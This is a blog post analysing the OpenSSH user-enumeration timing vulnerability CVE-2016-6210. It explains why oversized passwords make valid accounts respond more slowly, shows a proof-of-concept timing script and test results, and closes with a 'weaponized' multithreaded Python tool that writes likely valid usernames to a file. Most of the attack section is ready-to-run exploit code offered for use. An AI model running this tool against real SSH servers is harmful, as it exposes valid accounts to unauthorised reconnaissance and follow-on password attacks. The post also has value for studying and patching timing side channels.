Analyzing and Weaponizing the Latest OpenSSH Enumeration Vulnerability [CVE-2016-6210]

Released yesterday, CVE-2016-6210 has garnered quite a bit of attention in the community.

TLDR: It works.

The code is further down if that's all you came for.


The reactions have ranged from people expressing their distaste at the overall "hype", to a large number of people claiming either that they cannot get it to work or that the vulnerability is simply invalid, to even more people asking whether this is a rehash/re-release of older OpenSSH timing vulnerabilities such as CVE-2006-5229.

The majority of the hate has come from those saying that password authentication shouldn't be enabled on SSH in the first place.

I decided to do some analysis myself to verify exploitability as well as learn a little bit about the unavoidable semantics of yet-another-timing-attack.

Background:

Posted by Eddie Harari on Full Disclosure
http://seclists.org/fulldisclosure/2016/Jul/51

The brief:

By sending large passwords, a remote user can enumerate users on a system running SSHD. This problem exists in most
modern configurations due to the fact that it takes much longer to calculate a SHA256/SHA512 hash than a BLOWFISH hash.

The (more) technical:

When SSHD tries to authenticate a non-existing user, it falls back to a fake password structure hardcoded in the SSHD
source code. In this hardcoded structure the password hash is based on the BLOWFISH ($2) algorithm.
If real users' passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter
response times from the server for non-existing users.
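
To get a feel for the hashing-cost asymmetry locally (independent of SSHD), here is a rough sketch of my own, not something from the advisory or the PoC. It assumes the third-party passlib package is installed along with a bcrypt backend, and it relies on bcrypt only ever processing the first 72 bytes of the password while sha512-crypt processes the whole thing on every round:

import timeit
from passlib.hash import sha512_crypt, bcrypt   # third-party: pip install passlib bcrypt

long_pw = 'A'*25000	# the same oversized password the PoC sends

# sha512-crypt touches the full password each round, so cost scales with its length
sha_time = timeit.timeit(lambda: sha512_crypt.using(rounds=5000).hash(long_pw), number=5)/5
# bcrypt ($2) silently truncates input to 72 bytes, so the extra ~25KB costs nothing
bcrypt_time = timeit.timeit(lambda: bcrypt.hash(long_pw), number=5)/5

print("sha512_crypt avg: %.4fs" % sha_time)
print("bcrypt ($2) avg:  %.4fs" % bcrypt_time)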

NOTE: Mr. Harari tested this on opensshd-7.2p2, while my testing was done on OpenSSH_6.9p1.

Cannibalizing the code shared by Mr. Harari, I wrote up a PoC that would allow me to gather the data required to verify this vulnerability's authenticity.

import paramiko
import time, sys, csv

# Oversized password forces the target to hash ~25KB of input on every attempt
p='A'*25000
ssh = paramiko.SSHClient()

if(len(sys.argv) < 3):
	print "Usage: "+sys.argv[0]+" uname_list.txt host"
	sys.exit()

username_list = sys.argv[1]
target = sys.argv[2]
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Loop forever so the username list keeps being sampled
var = 1
while var == 1:
	with open(username_list) as users:
		for username in users:
			username = username.replace('\n','')
			# NOTE: time.clock() is wall-clock on Windows but CPU time on Unix;
			# swap in time.time() if running this from a *nix box
			starttime=time.clock()
			try:
				ssh.connect(target, username=username,password=p)
			except:
				pass	# authentication is expected to fail; we only care about the delay
			endtime=time.clock()
			total=endtime-starttime
			print(username+" : "+str(total))
			# Append each username,time sample to a CSV for later analysis
			with open('output.csv', 'a') as outputFile:
				csvFile = csv.writer(outputFile, delimiter=',')
				data = [[username, total]]
				csvFile.writerows(data)
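
To run the PoC (assuming it is saved as, say, ssh_enum_poc.py, a filename of my own choosing), point it at a newline-separated username list and the target host:

python ssh_enum_poc.py uname_list.txt 192.168.1.50

It prints each sample as it goes and keeps appending username,time rows to output.csv until you kill it.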

I ran 3 separate tests (a total of 4688 requests), letting the script continuously iterate through my list of account names (valid and invalid) and write the results to a CSV for analysis.

Included below are the two main tests and their results.

Excel() -> Sort() -> Graph() -> Light() -> Eyes()

The results were obvious -

Test 1:

Valid Users: realuser & test.
Raw Data -
I realized that the usernames I chose for this run were rather confusing, so Test 2 uses a clearer set.

Test 2:

Valid Users: justice, realuser, enumme.
Raw Data

We can plainly see that the existing users take significantly longer than the rest.
Calculations:
  • Non-Existing user average per request: 0.04704169506518s
  • Existing user average per request: 0.21342703801396s
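
For anyone who would rather skip the Excel step, a few lines of Python will pull the same per-username averages out of the PoC's output.csv. This is just a convenience sketch of mine, not part of the original analysis:

import csv
from collections import defaultdict

times = defaultdict(list)
with open('output.csv') as f:
	for row in csv.reader(f):
		if len(row) == 2:
			times[row[0]].append(float(row[1]))

# Slowest (and therefore most likely valid) usernames float to the top
for user, samples in sorted(times.items(), key=lambda kv: -sum(kv[1])/len(kv[1])):
	print("%-20s avg %.6fs over %d requests" % (user, sum(samples)/len(samples), len(samples)))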

I am currently working on developing an effective response-timing threshold for tool-based determination of "valid" usernames, as well as on porting all of this functionality to C.

Below is the first version of the "weaponized" exploit for this. It is currently based around a 10-30% range of deviation between the timings of valid and invalid usernames. Currently only usernames coming in at 20% or more above the benchmark are accepted as valid and appended to the output list accordingly (feel free to tweak this within the script). This has proved effective for me.

#!/usr/bin/python
import paramiko
import time, sys, csv, os
import threading, multiprocessing
import logging

if(len(sys.argv) < 4):
	print "REL: CVE-2016-6210"
	print "Usage: "+sys.argv[0]+" uname_list.txt host outfile"
	sys.exit()

p='A'*25000
THREAD_COUNT = 3	# This is also the amount of "samples" that the application will take into account for each calculation (time/THREAD_COUNT) = avg_resp;
FAKE_USER = "AaAaAaAaAa"	# Benchmark user, I definitely don't exist
BENCHMARK = 0

num_lines = sum(1 for line in open(sys.argv[1]))
username_list = sys.argv[1]
var = 0; time_per_user = 0;
threads = []; usertimelist = {};

def ssh_connection(target, usertarget, outfile):
	global time_per_user
	starttime = 0; endtime = 0; total = 0;
	ssh = paramiko.SSHClient()
	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	starttime = time.clock()
	try:
		ssh.connect(target, username=usertarget,password=p)
	except:
		pass	# authentication is expected to fail
	endtime = time.clock() # TIME the connection regardless of how it ended
	total = endtime - starttime
	# print usertarget+" : "+str(total) # print times of each connection attempt as its going (username:time)
	with open(outfile, 'a+') as outputFile:
		csvFile = csv.writer(outputFile, delimiter=',')
		data = [[usertarget, total]]	# log the username actually tested by this call
		csvFile.writerows(data)
	time_per_user += total

if not os.stat(username_list).st_size == 0:
	print "- Connection logging set to paramiko.log, necessary so Paramiko doesn't fuss, useful for debugging."
	paramiko.util.log_to_file("paramiko.log")
	ssh_bench = paramiko.SSHClient()
	ssh_bench.set_missing_host_key_policy(paramiko.AutoAddPolicy())
	print "- Calculating a benchmark using FAKE_USER for more accurate results..."
	tempbench = []
	for i in range(0,THREAD_COUNT):
		starttime = time.clock()
		try:
			ssh_bench.connect(sys.argv[2], username=FAKE_USER,password=p)
		except:
			pass	# authentication is expected to fail; we only want the elapsed time
		endtime = time.clock()
		tempbench.append(endtime - starttime)	# store the elapsed time, not the raw clock reading
	BENCHMARK = sum(tempbench)/len(tempbench)	# average response time for a known-bogus user
	print "* Benchmark Successfully Calculated: " + str(BENCHMARK)
	with open(username_list) as users:
		for username in users:
			username = username.replace('\n','')
			for i in range(THREAD_COUNT):
				threader = threading.Thread(target=ssh_connection, args=(sys.argv[2], username, sys.argv[3]))
				threads.append(threader)
			for thread in threads:
				thread.start()
				thread.join()
			threads = []
			print "[+] Averaged time for username "+username+" : "+str((time_per_user/THREAD_COUNT))
			usertimelist.update({username : (time_per_user/THREAD_COUNT)})
			time_per_user = 0
else:
	print "[-] List is empty.. what did you expect? Give me some usernames."
	# [thread.start() for thread in threads]
	# [thread.join() for thread in threads]	
fname = sys.argv[2].replace('.','_')+"_valid_usernames.txt"
for user in sorted(usertimelist.items(), key=lambda item: item[1], reverse=True):
	# Fractional deviation of this user's average response time above the bogus-user benchmark
	deviation = (user[1] - BENCHMARK)/BENCHMARK
	if(deviation <= .10): # within 10% of the benchmark
		print "[-] " + user[0] + " invalid user; less than 10 percent above benchmark at: "+str(deviation)
	elif(deviation < .20):
		print "[?] " + user[0] + " toss up, not including based on current settings at: "+str(deviation)
	elif(deviation < .30): # 20% or more above the benchmark
		print "[+] " + user[0] + " likely a valid user at: "+str(deviation) + ". Appending to: " + fname
		with open(fname, "a+") as outputFile:
			outputFile.write(user[0]+"\n")
	else: # 30% or more above the benchmark
		print "[+] " + user[0] + " is a valid user, appending to: " + fname
		with open(fname, "a+") as outputFile:
			outputFile.write(user[0]+"\n")
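
Invocation mirrors the PoC (again, the filename here is my own choice):

python cve_2016_6210_enum.py uname_list.txt 192.168.1.50 times.csv

The script benchmarks the bogus FAKE_USER first, then averages THREAD_COUNT samples per candidate username, and finally appends anything deviating far enough above the benchmark to 192_168_1_50_valid_usernames.txt.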

Coming maybe sometime soon:
  • Get true threads working for efficiency (right now it's rather slow); I had issues with timing accuracy when true threading was used (I also tried subprocesses). If someone gets this working, feel free to let me know and I will gladly update this.
  • Re-release in C. This has been added to the bitbucket repository; all credit for the C rendition goes to my friend and wonderful artist Anthony Garcia.

Justice Cassel
